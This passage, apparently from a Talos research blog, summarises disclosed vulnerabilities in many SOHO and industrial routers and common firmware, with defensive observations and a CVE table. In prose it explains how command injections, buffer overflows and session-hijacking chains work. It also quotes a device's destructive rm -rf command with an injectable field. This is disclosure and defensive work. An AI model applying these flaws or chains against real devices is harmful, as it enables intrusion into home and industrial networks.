  • TALOS-2022-1592: This vulnerability existed in the Wi-Fi mesh communication service of the device. This service utilized the open-source library, developed by OpenWrt, ubus. More specifically, this vulnerability was due to functionality Netgear built on top of the ubus library. If an attacker had knowledge of the web interface password or the default password, it would be possible to send a ubus message to activate a hidden telnet service. This hidden telnet functionality could then be used by an attacker to obtain direct access to the underlying busybox system.

Observations

The Netgear Orbi mainly suffered from a lack of user input sanitization and the presence of hidden services. User input should be sanitized server-side using well-tested libraries instead of one-off solutions, or worse, client-side solutions. Providing a telnet service is not inherently bad, but hiding the activation from a user does not seem to provide value. Including hidden ways of activating the telnet server makes it more difficult for a user to know how to minimize their risk.

Robustel R1510

Research conducted by Francesco Benvenuto.

Background

The Robustel R1510 was chosen due to the physical danger vulnerabilities could present. This router is used in physical systems such as elevators, and Robustel partners with many wide-reaching industrial control system vendors such as Vodafone, Bosch, Siemens, Emerson and Schneider Electric. Over the course of the research, Talos submitted 10 unique reports to Robustel, resulting in 26 CVEs. Research on the Robustel R1510 was primarily focused on the web server, which manages almost all functionality of the device.

Notable Vulnerabilities

  • TALOS-2022-1577: This vulnerability was contained within the web server and the functionality directly associated with installing a NodeJS application. While uploading a new NodeJS application, a global variable is set with the provided filename as part of the POST request. Once the file is uploaded to the web server, a second request is required to install the application. Using this request, it was possible for an attacker to trigger a command injection by crafting a maliciously named file. Once the application was installed, the command injection would be triggered. This allowed an attacker to execute arbitrary commands on the device.
  • TALOS-2022-1576: Talos discovered this vulnerability within the firmware upgrade functionality found within the web server. The R1510 utilized a modified U-Boot header but maintained the presence of the character array used for the firmware name. This field was not validated or escaped before being used directly in the function call system. An attacker could use this to craft a firmware update file that would result in arbitrary command injection during the update process.
  • TALOS-2022-1578: Talos discovered this vulnerability within the SSH-authorized key uploading feature within the web management interface of the R1510. An authenticated user could change their Linux username on the device. This created a directory path for the SSH keys used in certificate-based authentication. When a user uploaded a new SSH key, their username was used directly, without any validation, to build a directory path that was passed into a sysprintf function call, which would result in a command injection. An attacker could leverage a vulnerability to bypass authentication in the web interface, then continue to leverage this vulnerability to execute arbitrary commands within Linux.

Observations

Most of the discovered vulnerabilities in the Robustel R1510 were related to a lack of user input sanitization. Ideally, a common code base would be used for many instances of checks across the device. If there was no specific performance requirement, these checks would occur multiple times throughout the process of uploading files and utilizing previously uploaded files. Using a common library to perform these checks would negate the risk of validation falling out of sync with checks elsewhere in the system.

Sierra Wireless Airlink

Research conducted by Carl Hurd.

Background

Talos researchers chose to investigate the Sierra Wireless Airlink because of its deployment flexibility. The AirLink is intended for use in remote locations utilizing a cellular connection for local devices. The AirLink is managed out-of-band from the network provided by the device. Talos submitted 11 unique reports to Sierra Wireless, resulting in 13 CVEs. The research was focused on all aspects of the device, including the web server, custom console binary, SNMP and other exposed services on the device. If an attacker were to compromise this device, it would be possible to leverage the functionality of the device to manipulate traffic on all sides of the network.

Notable Vulnerabilities

  • TALOS-2018-0751: This vulnerability is contained within the web server ACEManager, which lacked a cross-site request forgery prevention header. These headers allow the server to check that requests are coming from a similar session in a coherent manner, instead of coming from a link of an unrelated browser capitalizing on a pre-authenticated session. This vulnerability allows for the possibility of session hijacking using various methods.
  • TALOS-2018-0750: This vulnerability existed in the ping_result.cgi binary, which did not properly filter input before reflecting it back to the client. This improper filtering allowed JavaScript to be injected into the response to the client. This could be used to run code on the client's browser, such as making requests on behalf of the user or disclosing confidential tokens. Using this vulnerability in addition to TALOS-2018-0751 allowed for complete session hijacking of an authenticated user.
  • TALOS-2018-0748: Talos discovered this vulnerability within the file upload capability of templates within the AirLink 450. When uploading template files, a user can specify the name of the file being uploaded. There were no restrictions to protect the files currently on the device and used for normal operation. If a file was uploaded with the same name as a file that already existed in the directory, it inherits the permissions of that file. In this case, multiple CGI files could be overwritten with execute permissions. After replacing the file, an adversary could navigate to the newly uploaded CGI binary, and the code would be executed. By leveraging TALOS-2018-0751 and TALOS-2018-0750, the adversary could hijack an authenticated session of a user after uploading malicious code and executing it on command. This would result in fully unauthenticated remote code execution.

Observations

Most of the findings on the Airlink 450 centered around the web server and the basic functionality it provides. The lack of CSRF tokens provided by the web server and the reflected XSS vulnerability allows authenticated requests to be made by hijacking a user’s session. A well-developed and tested web server should include CSRF automatically. The XSS can be mitigated by utilizing JavaScript libraries, or sanitization libraries if using CGI binaries, to sanitize user input properly. Finally, file upload functionality should be strictly limited to a folder that only contains user-uploaded files, to avoid permissions issues or file overwrites that could be used maliciously.

Siretta QUARTZ-GOLD

Research conducted by Francesco Benvenuto.

Background

The Siretta QUARTZ-GOLD was included in this research because the device is often deployed near critical devices, giving vulnerabilities an increased level of urgency. The device has a 4G/LTE failover mechanism for network uptime, which likely means the router is deployed on critical networks. Over the course of the research, Talos submitted 14 unique reports to Siretta, resulting in 62 CVEs. The research of the Siretta QUARTZ-GOLD explored all aspects of the router that were accessible by default. This included the HTTP server, SNMP server implementation, and various command line interface (CLI) tools. The majority of the router firmware is a fork of FreshTomato, which is an open-source router firmware. By utilizing this firmware, the QUARTZ-GOLD inherits a code reuse vulnerability from the project, just as many other projects that utilize the open-source codebase.

Notable Vulnerabilities

  • TALOS-2022-1638: This vulnerability existed in the M2M feature of the QUARTZ-GOLD. When the M2M feature was enabled, the m2m binary was executed. This binary offered rich functionality through a custom UDP protocol, including a function called “DELETE_FILE”, which would allow execution of the rm -rf <base_folder>/<M2M_data_entry.data> & command through the system function. The M2M_data_entry.data portion of the command was specified in the UDP packet without any parsing or sanitization on the M2M_data_entry.data string. This functionality was vulnerable to command injection. Furthermore, the DELETE_FILE functionality did not require authentication. An unauthenticated attacker could use this vulnerability to achieve arbitrary command execution.
  • TALOS-2022-1615: This vulnerability existed in the SNMP functionality of the router. The QUARTZ-GOLD implemented a feature that allowed for custom OIDs to be defined within the router. An attacker could submit a custom OID that would be executed whenever that OID was queried. The simplest solution was to execute commands directly as the root user in the Linux shell. An adversary could leverage this vulnerability to achieve arbitrary command injection.
  • TALOS-2022-1610: Talos discovered this vulnerability within the web server functionality of the QUARTZ-GOLD. By basing the firmware of this device off of the FreshTomato firmware, many default features were inherited from the FreshTomato firmware that was not documented as part of the device functionality. More specifically, debug functionality was not disabled in FreshTomato and allowed a user authenticated to the web interface to issue direct Linux commands as if they had a shell. An authenticated attacker could use this vulnerability to achieve arbitrary command injection.

Observations

The Siretta QUARTZ-GOLD inherited many of the discovered vulnerabilities from the third-party code base included in the product. FreshTomato includes many features that are prebuilt but could have been disabled if the manufacturer were more familiar with the code they were building from. Much of the debugging functionality provided by FreshTomato is undocumented in the Siretta device and seems unintentionally included. When reusing large code bases, it is important to know what exactly is being included in that code base, and how it can be properly configured for the use-case the developer has in mind.

Synology SRM - RT2600ac

Research conducted by Claudio Bozzato.

Background

The Synology RT2600ac is a high-end SOHO router that runs on Synology SRM (Synology Router Manager), a Linux-based operating system for all Synology routers. Talos researchers chose to look at this product because of its popularity and reputation for quality. We submitted nine reports to Synology, of which two affect their VPN service (QuickConnect), and one affects a Qualcomm tool used in SRM, eventually leading to the disclosure of 10 CVEs. QuickConnect is Synology’s VPN service, which allows for managing routers remotely without requiring the configuration of the router to expose its management port and without having to manage DDNS services to locate the router remotely.

This research has been detailed in a dedicated blog post, which explains how Talos managed to chain some of the reported vulnerabilities to achieve remote code execution without prior authentication in SRM devices via Synology's VPN services, which are publicly accessible.

Notable Vulnerabilities

  • TALOS-2020-1064: When routers connect to the QuickConnect VPN, they are placed in a dedicated subnet. This report demonstrates that the subnets are, however, not logically split, so it is possible to change the assigned netmask to a larger one, allowing one to talk with any other router connected to the same VPN. The VPNs are accessible by routers upon registration against QuickConnect. But after initial registration, the router is not needed anymore, and the attack can be performed independently of the device. There are several VPNs available that are easily enumerable and seem to be geo-located.
  • TALOS-2020-1066: This report describes a vulnerability in iptables' rules within the router. SRM defines filtering rules to prevent access only on selected ports from LAN. However, those rules are missing for connections that come from the QuickConnect VPN. This means that any service listening on the device is remotely accessible from the VPN. This can be used together with TALOS-2020-1064 to have unrestricted communication with any network service running in a chosen device from those reachable in the VPN.
  • TALOS-2020-1065 - This report describes a vulnerability in Qualcomm's lbd, a service reachable via LAN on ports 7786 and 7787, which can be used without authentication to directly execute shell commands as root, whenever an attacker is on the same LAN as the router. Since this is reachable via LAN, it is also reachable via the VPN. By chaining this vulnerability with the two above, it was possible to execute arbitrary commands as root via the VPN, without prior authentication, on any selected router connected to QuickConnect.

Observations

Synology SRM provides a convenient VPN service to solve the remote management issue for SOHO routers running on a dynamic IP address. However, this research has shown that such services can also widen the attack surface. Devices exposed via DDNS normally take more effort to be discovered, usually requiring an internet-wide scan. With QuickConnect, however, all devices are easily discovered as they're all connected to the same VPN, which is publicly accessible and whose geo-located services are easily enumerable.

TCL Linkhub Mesh Wifi

Research conducted by Carl Hurd.

Background

The TCL Linkhub is one of the newest products sold by TCL and the feature set and price tag could mean a very rapid adoption rate, much like the budget TV market. Over the course of the research, Talos submitted 17 unique reports to TCL, resulting in 42 CVEs. The research on the TCL Linkhub Mesh Wi-Fi system was primarily focused on the API service that is used for all management of the device. The Linkhub does not use a web server to serve a user interface, instead, all interaction with the device is done through a phone application. This phone application interacts with the device through a ProtoBuffer-based API. This service is one of the few ports open by default and thus was the most interesting target for this research.

Notable Vulnerabilities

  • TALOS-2022-1463: This vulnerability existed in the code for getting and setting values in a flash of the LinkHub. This vulnerability is interesting because it was not contained in a specific library and was used in almost every binary on the device. While getting values from a flash, the function did not take into account the length of the destination buffer. An attacker could easily change a configuration value to a large value, and the next time that variable was loaded from flash, it would cause a buffer overflow. This vulnerability would lead to arbitrary code execution.
  • TALOS-2022-1455: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it is dispatched to various handlers across the device. Within the set_mf_rule functionality, a memcpy occurs that determines length based on user input directly. Attackers could use this functionality to send a mf_rule message that contains fields larger than the statically sized buffers in the device. This vulnerability would lead to a buffer overflow and arbitrary code execution.
  • TALOS-2022-1458: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it’s dispatched to various handlers across the device. Within the ucloud_add_node functionality, which is used to add satellites to the router mesh, a MxpManageList message is parsed directly into the system function. An attacker could use a malicious message to execute arbitrary commands using this vulnerability.

Observations

The TCL LinkHub has a unique approach to management, which changes the attack surface significantly. Choosing to utilize Protobuffers for serialization is a good decision on the developer's part, as it is a well-tested and maintained library, but once the data is unserialized, much of the input is blindly trusted since it is assumed to come from the management application. All of this data should be treated as user data and more validation should occur once deserialization occurs, prior to use in potentially dangerous functions, such as memcpy.

TP-Link TL-R600VPN

Research conducted by Jared Rittle and Carl Hurd.

Background

The TP-Link TL-R600VPN became a subject of our research for its direct involvement in the VPNFilter campaign. The TP-Link TL-R600VPN is a five-port SOHO router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. This device is a fairly run-of-the-mill small router and contains network diagnostic capabilities and basic router functionality that is managed by a web server on the device. This research led to four Talos reports to TP-Link, resulting in four CVEs. For a more in-depth look at the research done on this device, refer to the corresponding blog post.

Notable Vulnerabilities

  • TALOS-2018-0620: This vulnerability existed in the header parsing of HTTP requests within the web server. This vulnerability was triggered by sending a request to a specific subset of pages on the web server. Once the request was made, a statically sized buffer is used for the parsed headers. An attacker could use an abnormally long header entry to overflow the buffer and overwrite the return address. This vulnerability leads to arbitrary code execution.
  • TALOS-2018-0619: This vulnerability existed in the network debugging functionality of the device. The ping functionality of the R600-VPN contained a parameter that was unchecked by user input. An attacker could supply an abnormally long ping_addr parameter to overflow the statically sized buffer used to hold the value, in turn overwriting the return address. This vulnerability leads to arbitrary code execution.
  • TALOS-2018-0618 - This vulnerability was contained within the HTTP server within the R600-VPN. The user-provided URL was parsed without regard for special characters such as "../" to navigate up a directory tree. Normally, special characters like this are removed or ignored in a URL and the directory navigation does not occur, but in the R600-VPN this navigation could be used to retrieve any files on the device. This vulnerability leads to sensitive information disclosure.

Observations

Most of the findings on the TL-R600VPN centered around the web server and the functionality provided by it. One of the simplest solutions to reduce risk is to integrate a well-tested web server instead of developing one from scratch or including untested code in the product. While some of the vulnerable code was within the web server itself, much of it was also added by the manufacturer for simple additional features, like network diagnostics. It is clear from this research that any added code needs to be reviewed to prevent these issues.

ZTE MF971R

Research conducted by Marcin Noga.

Background

The ZTE MF971R mobile router is one of the newest devices in the ZTE MF mobile routers family. At least in Poland, it is a very popular device and its popularity is due to the fact that it's being sold among others by major GSM providers or even added as a gift to some of their products/services. Over the course of the research, Talos submitted seven reports to ZTE, resulting in seven CVEs. The research on the ZTE MF971R router was primarily focused on the web application/server that is used for all management of the device. We have managed to find a set of vulnerabilities in Web APIs which chained together allowed us to create a one-click exploit, giving us full remote access to the device. See our deep dive whitepaper for a more in-depth explanation.

Notable Vulnerabilities

  • TALOS-2021-1317: This vulnerability is related to the implementation of CSRF protection/API restriction communication in Web APIs. To communicate with a certain set of Web APIs, a request should be sent from a 127.0.0.1 address or default router IP address — 192.168.0.1. It's verified by checking the HTTP Referer value. Unfortunately, the way the check was implemented gives an attacker the possibility to bypass it by simply adding string 127.0.0.1 in any part of a referrer URL and obtaining full access to API communication.
  • TALOS-2021-1320: Talos discovered this vulnerability within the implementation of the ADB_MODE_SWITCH Web API. A password parameter being a part of this API is not properly sanitized in the context of its length which leads to a stack-based buffer overflow. The victim does not need to be logged in to be affected by this vulnerability. The only constraint an attacker needs to pass is a referrer check, which is easy to bypass and has been described in TALOS-2021-1317. This remote pre-auth stack-based buffer overflow gives an attacker full control when overwriting the return address and as we demonstrated can be turned into one-click remote code execution.

Observations

The ZTE MF971R’s security suffered for several reasons. Despite visible efforts to reduce access to certain WebAPIs, it was still possible to bypass this mechanism, thus increasing the number of attack vectors. The main web server binary lacked compatibility with basic mitigations such as ASLR (Address Space Layout Randomization) and stack cookies, making the exploitation of existing vulnerabilities trivial. Improving security mechanisms in the aforementioned areas will reduce the number of attack vectors and make exploiting existing vulnerabilities, especially those without any authorization, more difficult or practically impossible.

Common frameworks

The previous section talked about the specific routers that we investigated. However, some of these routers also ran specific software that is common for many routers: open-source firmware such as OpenWrt, FreshTomato, AsusWRT or DD-WRT. One router also ran a specific kernel module called KCodes. As this software isn’t specific to the vendors we discussed in the router sections, we’re grouping the vulnerabilities we found together.

OpenWrt

Research conducted by Claudio Bozzato.

Background

OpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. It’s highly customizable and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources. Due to this, OpenWrt is a common choice among SOHO routers.

Notable Vulnerabilities

  • TALOS-2019-0893: This vulnerability affected the ustream-ssl library, a library that works as an SSL wrapper for OpenSSL, mbed TLS and wolfSSL. This issue describes how the library does not terminate the SSL connection immediately when a wrong certificate is supplied by an HTTPS server, allowing the client to send one request using any unverified certificate, before terminating the connection. As OpenWrt uses this library for tools like wget, any functionality relying on it would be affected by this information leak when requesting any HTTPS URL, which could allow, in the worst case, for an attacker to perform a man-in-the-middle attack and steal any sensitive information present in the request.

Observations

Because the HTTPS connection eventually terminates with an error, this issue can easily go unnoticed. As OpenWrt is a platform that is easy to customize and write scripts for, such a vulnerability may affect a large number of users.

FreshTomato

Research conducted by Francesco Benvenuto.

Background

The FreshTomato is a popular open-source firmware project. It is an actively maintained and modern firmware project that’s widely used by multiple SOHO routers. By default, it ships with several functionalities, e.g., SSH, VPN capabilities, Telnet, Routing, etc.

Notable Vulnerabilities

  • TALOS-2022-1642: This vulnerability existed in one of the functionalities provided by FreshTomato's HTTP server. It provides a simple template language, one of the templating functions to read the content of a file, provided by the user in a specific folder. Because no sanitization is performed and the file path is composed by concatenating the hard-coded path with the provided filename, this function is vulnerable to path traversal. An attacker with valid credentials could read any file in the file system.
  • TALOS-2022-1641: This vulnerability existed in one of the log-related functions provided by FreshTomato's HTTP server. The functionality allows users to find certain strings in the log file via OS commands. Because no real sanitization is performed against the user-controlled parameter, this function is vulnerable to an OS command injection vulnerability. An attacker could leverage this vulnerability to achieve arbitrary command injection.
  • TALOS-2022-1509: This vulnerability existed in the URL unescape functionality provided by FreshTomato's HTTP server. The unescape always assumes that there are two characters following the '%' character. However, this is not the case and opens the door to an out-of-bounds read-and-write.

Observations

Because the FreshTomato project is the base for many routers, any vulnerability found in the software could have wide-ranging consequences. We cannot fully gauge how the firmware is deployed and how much impact these vulnerabilities will have on the deployed router.

Asuswrt and Asuswrt-Merlin New Gen, DD-WRT

Research conducted by Francesco Benvenuto.

Background

Like FreshTomato, Asuswrt and Asuswrt-Merlin, New Gen and DD-WRT are the base firmware for several SOHO routers.

Notable Vulnerabilities

  • TALOS-2022-1511: This vulnerability existed in the URL unescape functionality provided by the Asuswrt and Asuswrt-Merlin New Gen vulnerability’s HTTP server. The unescape always assumes that there are two characters following the "%" character. However, this is not the case and could lead to an out-of-bounds read and write.
  • TALOS-2022-1510: This vulnerability is in the URL unescape functionality provided by the DD-WRT’s HTTP server. The unescape always assumes that there are two characters following the "%" character, however, this assumption is incorrect and could lead to an out-of-bounds read and write.

Observations

After our researchers discovered TALOS-2022-1509, we discovered other software that was vulnerable to the same unescape vulnerable pattern, including TALOS-2022-1511 in Asuswrt and Asuswrt-Merlin New Gen, and TALOS-2022-1510 in DD-WRT.

KCodes NetUSB.ko

Research conducted by Dave McDaniel.

Background

Some NETGEAR routers utilize a bespoke kernel module called NetUSB.ko from a Taiwanese company called KCodes. This module is custom-made for each device but contains similar functionality. The module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices in such a way that the client machine treats the remote device as a local USB device plugged into their computer. The software used for NETGEAR routers is called NETGEAR USB Control Center, and it utilizes a driver called NetUSBUDSTcpBus.sys (on Windows) for communications.

Notable Vulnerabilities

  • TALOS-2019-0775: Once the static AES key was recovered, an attacker could easily trigger a DoS or remote information disclosure using a single opcode after the handshake.
  • TALOS-2019-0776: Similar to TALOS-2019-0775, this vulnerability leaks memory. In this case, it leaks very useful memory such as stack boundary addresses, a pointer to a specific configuration function and notably or the base address of the running kernel module NetUSB.ko. This could potentially be combined with other remote attacks that could leverage this data when designing a specific payload for the target.

Observations

Many other products use NetUSB.ko. A previously disclosed vulnerability in 2015 led researchers to believe a flaw in this very kernel module potentially existed in as many as 92 products across multiple vendors. For this analysis, we utilized the R8000 hardware to test the R8000 version of NetUSB.ko (1.0.2.66) and the R7900 version (1.0.2.69) since both modules are compiled for the same kernel. Specifically, the information disclosed in TALOS-2019-0776 appears to be particularly useful for recovering sensitive memory addresses for payload generation, regardless of the architecture/operating system that uses the kernel module.

Key observations

SOHO routers are generally valuable targets for adversaries due to their position within the network and wide adoption within common network deployments. Their relatively low cost, wide availability, ease of acquisition and user-friendly management features leads to these products being in many homes, small and home offices, warehouses, coffee shops and many other businesses. They are even deployed as gateways providing remote access to industrial environments.

Vulnerabilities in these routers can provide entry to a huge variety of targets, and the same vulnerability can be used for impact, meaning these routers are high-value targets for malicious actors.

The security posture of these lower-cost routers has improved over the last few years, but in general, security advice for these devices is the same as it has been in the past. Some of the important security tenants for manufacturers are:

  • Features and services should be disabled by default unless they are critical for the operation of the device.
  • WAN-side management should be deactivated by default.
  • Support modern security features such as TLS/SSL encryption and make sure they're implemented properly.
  • Never trust user input.
  • Keep third-party code up-to-date.
  • Audit or familiarize yourself with integrated code.
  • Don’t rely on obscure and undocumented diagnostic features or credentials.

Each of the vulnerabilities discovered fall into one of these categories. Code quality is always going to be an additional concern, and the utilization of safe functions should always be enforced during development. Ideally, use static analysis tooling during development. This may not be financially viable for many products hoping to keep consumer costs low. In this case, lean on compiler warnings and any other methods of ensuring the highest code quality possible.

Simple changes to the development process can mitigate many of the worst effects of these issues. Memory corruption, one of the most glaring vulnerabilities, can be mitigated by using memory-safe languages (i.e., Rust and Go). If safe languages are not an option, vendors should make sure to implement as many mitigations as possible, both compiler-based and OS-based. Examples of these mitigations would be non-executable stacks and address space layout randomization (ASLR).

The next most helpful change involves defining user interaction boundaries. Generic strings are notoriously difficult to parse or apply access controls to. By utilizing a well-defined API boundary, it is easier to validate user requests and input. The boundary also acts as an access control list to prevent a malicious user from executing arbitrary commands or providing input that would result in other unexpected behavior.

The most important security step a user of these devices can take is to assess each service present on the device. Verify that each service running is required for the day-to-day operation of each device, and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable. Start your assessment by reading the router user manually thoroughly, even before purchase. The quality of details concerning device features in a user manual is often indicative of the overall product quality.

While the security posture of SOHO routers has generally improved, many could benefit from low-cost mitigations that would drastically improve their security posture. Over the past few years, Talos has published 141 advisories covering 289 CVEs within 13 SOHO and industrial routers and six common frameworks. Talos vulnerability research is always driven by the mandate to protect Cisco customers, but we also aim to improve the security of all devices we research. All research has been publicly disclosed, after disclosure to the vendor, according to Cisco’s vulnerability disclosure policy. These disclosures directly result in vulnerability remediations that improve the security posture of anyone using these devices.

Vulnerability List

This blog post included a summary of each router and a few select vulnerabilities. Below is a list of all the advisories Talos disclosed post-VPNFilter.

Talos ID (Linked to Report)

CVE(s)

Product

TALOS-2022-1511

CVE-2022-26376

Asuswrt and Asuswrt-Merlin New Gen

TALOS-2022-1592

CVE-2022-38393

Asus RT-AX82U

TALOS-2022-1590

CVE-2022-38105

Asus RT-AX82U

TALOS-2022-1586

CVE-2022-35401

Asus RT-AX82U

TALOS-2021-1361

CVE-2021-21913

D-Link DIR3040

TALOS-2021-1285

CVE-2021-21820

D-Link DIR3040

TALOS-2021-1284

CVE-2021-21819

D-Link DIR3040

TALOS-2021-1283

CVE-2021-21818

D-Link DIR3040

TALOS-2021-1282

CVE-2021-21817

D-Link DIR3040

TALOS-2021-1281

CVE-2021-21816

D-Link DIR3040

TALOS-2022-1510

CVE-2022-27631

DD-WRT

TALOS-2022-1642

CVE-2022-38451

FreshTomato

TALOS-2022-1641

CVE-2022-42484

FreshTomato

TALOS-2022-1509

CVE-2022-28664 - CVE-2022-28665

FreshTomato

TALOS-2022-1523

CVE-2022-25932

InHand Networks InRouter302

TALOS-2022-1522

CVE-2022-29888

InHand Networks InRouter302

TALOS-2022-1521

CVE-2022-28689

InHand Networks InRouter302

TALOS-2022-1520

CVE-2022-26023

InHand Networks InRouter302

TALOS-2022-1519

CVE-2022-30543

InHand Networks InRouter302

TALOS-2022-1518

CVE-2022-29481

InHand Networks InRouter302

TALOS-2022-1501

CVE-2022-26518

InHand Networks InRouter302

TALOS-2022-1500

CVE-2022-26075

InHand Networks InRouter302

TALOS-2022-1499

CVE-2022-26420

InHand Networks InRouter302

TALOS-2022-1496

CVE-2022-27172

InHand Networks InRouter302

TALOS-2022-1495

CVE-2022-26510

InHand Networks InRouter302

TALOS-2022-1481

CVE-2022-26780 - CVE-2022-26782

InHand Networks InRouter302

TALOS-2022-1478

CVE-2022-26042

InHand Networks InRouter302

TALOS-2022-1477

CVE-2022-25995

InHand Networks InRouter302

TALOS-2022-1476

CVE-2022-26002

InHand Networks InRouter302

TALOS-2022-1475

CVE-2022-26007

InHand Networks InRouter302

TALOS-2022-1474

CVE-2022-26020

InHand Networks InRouter302

TALOS-2022-1473

CVE-2022-26085

InHand Networks InRouter302

TALOS-2022-1472

CVE-2022-21182

InHand Networks InRouter302

TALOS-2022-1471

CVE-2022-24910

InHand Networks InRouter302

TALOS-2022-1470

CVE-2022-25172

InHand Networks InRouter302

TALOS-2022-1469

CVE-2022-21238

InHand Networks InRouter302

TALOS-2022-1468

CVE-2022-21809

InHand Networks InRouter302

TALOS-2019-0776

CVE-2019-5017

KCodes NetUSB.ko

TALOS-2019-0775

CVE-2019-5016

KCodes NetUSB.ko

TALOS-2018-0625

CVE-2018-3953 - CVE-2018-3955

Linksys E Series

TALOS-2023-1723

CVE-2023-25582 - CVE-2023-25583

Milesight UR32L

TALOS-2023-1718

CVE-2023-24019

Milesight UR32L

TALOS-2023-1716

CVE-2023-25081 - CVE-2023-25124

Milesight UR32L

TALOS-2023-1715

CVE-2023-24018

Milesight UR32L

TALOS-2023-1714

CVE-2023-22653

Milesight UR32L

TALOS-2023-1713

CVE-2023-24595

Milesight UR32L

TALOS-2023-1712

CVE-2023-22299

Milesight UR32L

TALOS-2023-1711

CVE-2023-22365

Milesight UR32L

TALOS-2023-1710

CVE-2023-24582 - CVE-2023-24583

Milesight UR32L

TALOS-2023-1706

CVE-2023-24519 - CVE-2023-24520

Milesight UR32L

TALOS-2023-1705

CVE-2023-23546

Milesight UR32L

TALOS-2023-1699

CVE-2023-22659

Milesight UR32L

TALOS-2023-1698

CVE-2023-22306

Milesight UR32L

TALOS-2023-1697

CVE-2023-23902

Milesight UR32L

TALOS-2023-1696

CVE-2023-23571

Milesight UR32L

TALOS-2023-1695

CVE-2023-23547

Milesight UR32L

TALOS-2023-1694

CVE-2023-23550

Milesight UR32L

TALOS-2023-1704

CVE-2023-24496 - CVE-2023-24497

MilesightVPN

TALOS-2023-1703

CVE-2023-22371

MilesightVPN

TALOS-2023-1702

CVE-2023-23907

MilesightVPN

TALOS-2023-1701

CVE-2023-22319

MilesightVPN

TALOS-2023-1700

CVE-2023-22844

MilesightVPN

TALOS-2022-1598

CVE-2022-38458

Netgear Orbi Router RBR750

TALOS-2022-1597

CVE-2022-36429

Netgear Orbi Satellite RBS750

TALOS-2022-1596

CVE-2022-37337

Netgear Orbi Router RBR750

TALOS-2022-1595

CVE-2022-38452

Netgear Orbi Router RBR750

TALOS-2019-0893

​​CVE-2019-5101 - CVE-2019-5102

OpenWrt

TALOS-2022-1580

CVE-2022-34845

Robustel R1510

TALOS-2022-1579

CVE-2022-33897

Robustel R1510

TALOS-2022-1578

CVE-2022-34850

Robustel R1510

TALOS-2022-1577

CVE-2022-33150

Robustel R1510

TALOS-2022-1576

CVE-2022-32765

Robustel R1510

TALOS-2022-1575

CVE-2022-35261-CVE-2022-35271

Robustel R1510

TALOS-2022-1573

CVE-2022-33325-CVE-2022-33329

Robustel R1510

TALOS-2022-1572

CVE-2022-33312-CVE-2022-33314

Robustel R1510

TALOS-2022-1571

CVE-2022-28127

Robustel R1510

TALOS-2022-1570

CVE-2022-32585

Robustel R1510

TALOS-2018-0756

CVE-2018-4072 - CVE-2018-4073

Sierra Wireless Airlink

TALOS-2018-0755

CVE-2018-4070 - CVE-2018-4071

Sierra Wireless Airlink

TALOS-2018-0754

CVE-2018-4069

Sierra Wireless Airlink

TALOS-2018-0753

CVE-2018-4068

Sierra Wireless Airlink

TALOS-2018-0752

CVE-2018-4067

Sierra Wireless Airlink

TALOS-2018-0751

CVE-2018-4066

Sierra Wireless Airlink

TALOS-2018-0750

CVE-2018-4065

Sierra Wireless Airlink

TALOS-2018-0749

CVE-2018-4064

Sierra Wireless Airlink

TALOS-2018-0748

CVE-2018-4063

Sierra Wireless Airlink

TALOS-2018-0747

CVE-2018-4062

Sierra Wireless Airlink

TALOS-2018-0746

CVE-2018-4061

Sierra Wireless Airlink

TALOS-2022-1640

CVE-2022-42490-CVE-2022-42493

Siretta QUARTZ-GOLD

TALOS-2022-1639

CVE-2022-41991

Siretta QUARTZ-GOLD

TALOS-2022-1638

CVE-2022-40222

Siretta QUARTZ-GOLD

TALOS-2022-1637

CVE-2022-41154

Siretta QUARTZ-GOLD

TALOS-2022-1615

CVE-2022-38066

Siretta QUARTZ-GOLD

TALOS-2022-1613

CVE-2022-40985-CVE-2022-41030

Siretta QUARTZ-GOLD

TALOS-2022-1612

CVE-2022-40220

Siretta QUARTZ-GOLD

TALOS-2022-1611

CVE-2022-39045

Siretta QUARTZ-GOLD

TALOS-2022-1610

CVE-2022-38715

Siretta QUARTZ-GOLD

TALOS-2022-1609

CVE-2022-38088

Siretta QUARTZ-GOLD

TALOS-2022-1608

CVE-2022-38459

Siretta QUARTZ-GOLD

TALOS-2022-1607

CVE-2022-40969

Siretta QUARTZ-GOLD

TALOS-2022-1606

CVE-2022-40701

Siretta QUARTZ-GOLD

TALOS-2022-1605

CVE-2022-36279

Siretta QUARTZ-GOLD

TALOS-2020-1064

None (Cloud)

Synology QuickConnect

TALOS-2020-1060

None (Cloud)

Synology QuickConnect

TALOS-2020-1087

CVE-2020-27659-CVE-2020-27660

Synology SRM

TALOS-2020-1086

CVE-2020-27658

Synology SRM

TALOS-2020-1071

CVE-2020-27656-CVE-2020-27657

Synology SRM

TALOS-2020-1066

CVE-2020-27655

Synology SRM

TALOS-2020-1065

CVE-2020-27654, CVE-2020-11117

Synology SRM

TALOS-2020-1061

CVE-2020-27652-CVE-2020-27653

Synology SRM

TALOS-2020-1059

CVE-2020-27650-CVE-2020-27651

Synology SRM

TALOS-2020-1058

CVE-2020-27648-CVE-2020-27649

Synology SRM

TALOS-2020-1051

CVE-2019-11823

Synology SRM

TALOS-2022-1507

CVE-2022-26346

TCL LinkHub Mesh Wifi

TALOS-2022-1506

CVE-2022-27178

TCL LinkHub Mesh Wifi

TALOS-2022-1505

CVE-2022-27185

TCL LinkHub Mesh Wifi

TALOS-2022-1504

CVE-2022-27630

TCL LinkHub Mesh Wifi

TALOS-2022-1503

CVE-2022-27633

TCL LinkHub Mesh Wifi

TALOS-2022-1502

CVE-2022-27660

TCL LinkHub Mesh Wifi

TALOS-2022-1484

CVE-2022-26342

TCL LinkHub Mesh Wifi

TALOS-2022-1483

CVE-2022-26009

TCL LinkHub Mesh Wifi

TALOS-2022-1482

CVE-2022-25996

TCL LinkHub Mesh Wifi

TALOS-2022-1463

CVE-2022-24005 - CVE-2022-24029

TCL LinkHub Mesh Wifi

TALOS-2022-1462

CVE-2022-23103

TCL LinkHub Mesh Wifi

